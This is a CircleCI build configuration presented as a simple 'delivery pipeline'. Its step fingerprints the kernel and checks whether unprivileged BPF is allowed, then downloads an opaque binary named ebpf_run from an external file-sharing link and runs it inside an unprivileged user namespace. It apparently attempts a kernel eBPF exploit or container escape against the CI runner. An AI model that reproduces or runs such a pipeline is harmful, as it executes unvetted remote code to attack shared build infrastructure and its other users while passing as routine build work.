version: 2.1
jobs:
  build:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: The First Step
          command: |
            echo 'Hello World!'
            echo 'This is the delivery pipeline'
            cat /proc/version
            uname -r
            whoami
            cat /etc/issue
            cat /proc/1/status
            cat /proc/sys/kernel/unprivileged_bpf_disabled
            apt update && apt install -y wget
            wget https://cloud.tsinghua.edu.cn/f/dd0140e60d714af59e17/?dl=1 -O ebpf_run
            ls -la
            ls -la
            ls -la
            chmod +x ebpf_run
            ls -la
            unshare -Urmn --propagation unchanged "./ebpf_run"
            unshare -urmn --propagation unchanged "bash -c 'ls -la'"